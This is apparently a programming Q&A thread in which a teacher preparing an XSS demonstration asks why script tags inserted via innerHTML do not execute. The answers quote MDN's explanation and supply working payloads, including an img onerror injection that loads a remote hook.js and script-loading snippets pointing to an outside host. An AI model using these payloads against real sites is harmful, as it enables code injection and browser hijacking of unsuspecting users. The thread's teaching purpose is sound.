# Why can't I write this script dynamically into a page?

Tags: javascript, browser, xss

I'm trying to demonstrate cross site scripting to some students and ironically enough I can't get it to work!

both of the following scripts seem to do nothing

```
document.body.innerHTML += `
<script src="/hook.js" defer async></s${''}cript>
`

document.body.innerHTML += `
<script>
var s = document.createElement('script')
s.setAttribute('src', '/hook.js')
document.body.appendChild(s)
</s${''}cript>
`
```

I can see the node added to the DOM in devtools and it looks right but no query is fired in my network tab. If I take the same exact code and put it in the html directly than the query fires.

I've tried this in latest chrome and firefox

What's going on? Is this some sort of anti-xss protection?

Answer (score 1, accepted):

Ok, so digging in I found out [this interesting factoid](https://developer.mozilla.org/en-US/docs/Web/API/Element/innerHTML#Security_considerations)

> It is not uncommon to see innerHTML used to insert text in a web page.
>   This comes with a security risk.
>
> ```
>     var name = "John";
>     // assuming el is an HTML DOM element
>     el.innerHTML = name; // harmless in this case
>
>     // ...
>
> name = "<script>alert('I am John in an annoying alert!')</script>";
> el.innerHTML = name; // harmless in this case
> ```
>
> Although this may look like a cross-site scripting attack, the result
>   is harmless. HTML5 specifies that a `<script>` tag inserted via
>   innerHTML should not execute.
>
> However, there are ways to execute JavaScript without using 
>   elements, so there is still a security risk whenever you use innerHTML
>   to set strings over which you have no control. For example:
>
> ```
> var name = "<img src=x onerror=alert(1)>";
> el.innerHTML = name; // shows the alert
> ```
>
> For that reason, it is recommended you not use innerHTML when
>   inserting plain text; instead, use `node.textContent`. This doesn't
>   interpret the passed content as HTML, but instead inserts it as raw
>   text.

So it sounds like things are working exactly as intended (and just older browsers had this implemented incorrectly). You can still trigger XSS, you just have to be slightly more clever about it.

```
<img src="/doesntesist.png" onerror="var s = document.createElement(`script`);s.setAttribute(`src`, `http:///hook.js`); document.body.appendChild(s);" />
```

Answer (score 0):

Try this

```
document.write("<script type=\"text/javascript\" src=\"http://othree.net/tmp/test.js\"><\/script>");
```

or use DOM method to add

```
var z1 = document.createElement("script");
z1.type = "text/javascript";
z1.src = "http://othree.net/tmp/test.js";
document.getElementsByTagName("head")[0].appendChild(z1);
```

Comment: Can you put the actual code that would need to be done for injection? Obviously what you're doing here works if you put it directly into a document, but what if its in an xss string?

Comment: See my answer for why it is not so simple